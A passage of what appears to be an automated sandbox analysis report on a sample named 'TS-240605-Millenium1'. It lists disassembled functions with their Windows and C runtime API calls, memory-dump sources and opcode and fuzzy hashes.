Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
Instruction ID: 454f21f9ec8000a06ff978de726e81e89b8adad053f60da8d6b01f1dadca36b7
Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
Instruction Fuzzy Hash: E291E876F0865286F7508F65964127D2BB4BB62B8AF54413AFE8EF7A84CF38E441C700

Function 00007FF6CEB404DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6CEB405CC
_get_daylight.LIBCMT ref: 00007FF6CEB405DD
_get_daylight.LIBCMT ref: 00007FF6CEB405EE
_isindst.LIBCMT ref: 00007FF6CEB406B9

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
Instruction ID: 9492486ef80cca67d5fd6870a678d1b0fd66d6dc918228d00fa4f2a19d2dd3c9
Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
Instruction Fuzzy Hash: 36510672F092128AEB14DF64DA856BC3771AB6135AF500136FE5EA3AE5DF3CA442C701

Function 00007FF6CEB35EF0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB35F1D
CreateFileW.KERNELBASE ref: 00007FF6CEB35F5C
CloseHandle.KERNEL32 ref: 00007FF6CEB35F91

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
Instruction ID: 0af7d0b262195b0aa8d05bf673186281d119a690477ec265c1d15c968ff36f26
Opcode Fuzzy Hash: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
Instruction Fuzzy Hash: 3341BD22E1878283E7148F2097413B96270FBA67A5F109335FADC93AD6DF7CA5E48700

Function 00007FF6CEB2C3CC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB2C59C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6CEB2C5B0

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6CEB2C3F0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6CEB2C45E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6CEB2C4B1

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
Instruction ID: 3df67e4bdbf5a1ecad684ebac4116086f9bc17feda80f3514d48262767852acf
Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
Instruction Fuzzy Hash: 73318D21E0C60342FA14AF64971A3B922B19F73786F554035FADEEB2E7DE2CF4058A51

Function 00007FF6CEB3A7E4 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6CEB3A7E0), ref: 00007FF6CEB3A7F5
TerminateProcess.KERNEL32(?,?,?,00007FF6CEB3A7E0), ref: 00007FF6CEB3A800
ExitProcess.KERNEL32 ref: 00007FF6CEB3A80F

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
Instruction ID: ec3d2d2d81f0f0e018d78010e9a567626e76b80674f49cbe2fb63f50b2d029bd
Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
Instruction Fuzzy Hash: 54D05E10F0830243FA047F701A8603812315F6AF03F101439E89BA3383CD3CB40E8600

Function 00007FF6CEB28D80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE ref: 00007FF6CEB28DC0

Part of subcall function 00007FF6CEB22C30: MessageBoxW.USER32 ref: 00007FF6CEB22D05

Strings

Security descriptor is not initialized!, xrefs: 00007FF6CEB28D90

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CreateDirectoryMessage
String ID: Security descriptor is not initialized!
API String ID: 73271072-986317556
Opcode ID: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
Instruction ID: f5a6345016e23e35525a981e553574c1d159483e4c22b28b27818d9078251069
Opcode Fuzzy Hash: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
Instruction Fuzzy Hash: 3AE06DB2A18B4682EA609F24E90527922A0BB72765F800335F1CCE63E4DF3CD1098B00

Function 00007FF6CEB30A6C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB30AB0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB30BA7

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
Instruction ID: 6f3065bf7aeeac756b0df6027fbe2d76f84f7610c41aa3a4af083fb30bb0a52a
Opcode Fuzzy Hash: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
Instruction Fuzzy Hash: CE512D21B0DA4147FA289E35961267A62B1BF62BA9F144730FDEDA77C5DE3CE4408600

Function 00007FF6CEB3B910 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6CEB3B78D,?,?,00000000,00007FF6CEB3B842), ref: 00007FF6CEB3B97E
GetLastError.KERNEL32(?,?,?,00007FF6CEB3B78D,?,?,00000000,00007FF6CEB3B842), ref: 00007FF6CEB3B988

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
Instruction ID: d6b43d95577814e1622cfababa9a5afca08384912be31bbbeee8934fde2f78d2
Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
Instruction Fuzzy Hash: 2121FC32F0864342FE945F1196C227812A25FA2B95F040335F6DDE73C9CE2CEC454301

Function 00007FF6CEB3CEE4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6CEB3D07D), ref: 00007FF6CEB3CF30
GetLastError.KERNEL32(?,?,?,?,?,00007FF6CEB3D07D), ref: 00007FF6CEB3CF3A

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
Instruction ID: ffffdc3f24bdc3b69e9ed496a8f4da8d8f320e43432f7d21d4cd776b151a0a78
Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
Instruction Fuzzy Hash: FF11B266608A8182DA108F25A6051797371AB56BF5F544331FAFD977D9CF3CE0548B00

Function 00007FF6CEB388E0 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB3875D), ref: 00007FF6CEB38903
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB3875D), ref: 00007FF6CEB38919

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
Instruction ID: 5466a3ee8ed81a1a7ff36f24d0d6c9737512c9c19cc6c9838b85d068c9c8f8c3
Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
Instruction Fuzzy Hash: DD017C3290C25282E7609F14A50623AB3B1FB92B62F601336F6E9929D8DF7CE004DB01

Function 00007FF6CEB3B700 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
Instruction ID: 477548eee9d1e961f7a6625ea6bb7e4cd45a4d0cc92f7cedebe9138dc4296b7a
Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
Instruction Fuzzy Hash: 97E08612F0D60283FF185FB156D607412718F76B52B440030F98DE7351DE2C68858640

Function 00007FF6CEB38ECC Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF6CEB38ED0
GetLastError.KERNEL32 ref: 00007FF6CEB38EDA

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
Instruction ID: a9e4acd93c040ba791b79048a858436860f12e0d66c7102407d09e53294eaf1e
Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
Instruction Fuzzy Hash: 2FD01214F2951383FA242FB91E8603852B42F77B27F500732F0ADE22D0DE5CF0851602

Function 00007FF6CEB38648 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF6CEB3864C
GetLastError.KERNEL32 ref: 00007FF6CEB38656

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
Instruction ID: 5498fd00dd3f348ad2eb7c2b61c28bd4266554d1bdab68bd69cf4f7da56821eb
Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
Instruction Fuzzy Hash: 2CD0C910F1954396FA242FB51E4643811B02FB7B27F600631E09DE22D0DE6CA0454A02

Function 00007FF6CEB27F50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

_findclose.LIBCMT ref: 00007FF6CEB281A9

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
Instruction ID: b40d732f6c21e96f95af12a4b50b6e2cfe81db785ee1414ee2bfb672fd35a2dd
Opcode Fuzzy Hash: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
Instruction Fuzzy Hash: 9B716E52E18AC581E611CF2CD6492FD6370FBB9B48F55E321EB9C62592EF28E2D5C700

Function 00007FF6CEB3CC5C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB3CC84

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
Instruction ID: d51b483f4254a5457c8fede7491ddcb81c3912debc409cc6ef7d0eb0a0ac67af
Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
Instruction Fuzzy Hash: 0841E73294920147EA348F69E64217977B0EB67742F140231F6DEE3690CF2CF402CBA1

Function 00007FF6CEB285F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: ef079cd77129d22be3eb03a79881853608d6625fc6b272817acf66f86254b52f
Instruction ID: 3753b96984cde3a7769076cec94cb8e9af91d55f79fab7e4fdc4e60c7d8e2440
Opcode Fuzzy Hash: ef079cd77129d22be3eb03a79881853608d6625fc6b272817acf66f86254b52f
Instruction Fuzzy Hash: 46417316D1C78681EA119F2496062BD6370FFB6745F54A632EFCDA2193EF2CA5D8C300

Function 00007FF6CEB284C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6CEB2856A

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
Instruction ID: 8aad564e355a4ea39a6570193cf59c35bfab7da354a37d69237d5a4e74b427ce
Opcode Fuzzy Hash: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
Instruction Fuzzy Hash: 3C21FC21B0969246FE509F2267097FAA665BF66BC5F8C4430FE8D97786DE3CE001C700

Function 00007FF6CEB3C6EC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB3C772

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
Instruction ID: cca9065e196739123ac7a028fea2677244056ae726b4d782e84633f3b64ef47a
Opcode Fuzzy Hash: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
Instruction Fuzzy Hash: 2931A322E1960287F7155F958A423B82670AB62B97F410135FE9DE73D2CF7CF4418B61

Function 00007FF6CEB3A715 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6CEB3A743

Part of subcall function 00007FF6CEB3A83C: GetModuleHandleExW.KERNEL32 ref: 00007FF6CEB3A861
Part of subcall function 00007FF6CEB3A83C: GetProcAddress.KERNEL32 ref: 00007FF6CEB3A877
Part of subcall function 00007FF6CEB3A83C: FreeLibrary.KERNEL32 ref: 00007FF6CEB3A89E

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
